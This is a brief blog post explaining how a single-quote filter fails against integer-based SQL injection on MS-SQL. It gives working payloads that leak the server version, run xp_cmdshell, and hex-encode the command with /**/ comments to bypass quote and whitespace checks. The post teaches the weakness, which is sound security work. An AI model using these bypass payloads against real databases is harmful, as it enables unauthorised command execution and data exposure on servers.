SQL Injection, Getting past the magic quote

December 30, 2007

I recently encountered a SQL Injection, against a MS-SQL database. It happened to be an integer based injection.  Developers thought, that checking for a single quote(') in the input, would be sufficient to protect against SQL Injection attacks. What this meant was i can ask the server to return information like this:-

id=1 and 1=(select @@version)— 

However, becuase the application checks for single quote in input, i could not run this query successfully:-

id=1; exec master..xp_cmdshell('ping 127.0.0.1');–

This could , however be bypassed by using a simple hex encoding trick.

id=1;declare/**/@a/**/varchar(999)/**/set@a=0x65786563

206d617465722e2e78705f636d647368656c6c282770696e6720

3132372e302e302e312729/**/exec(@a);–

In the above example, there is also a small trick to bypass white space protection in the input by using /**/. 

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback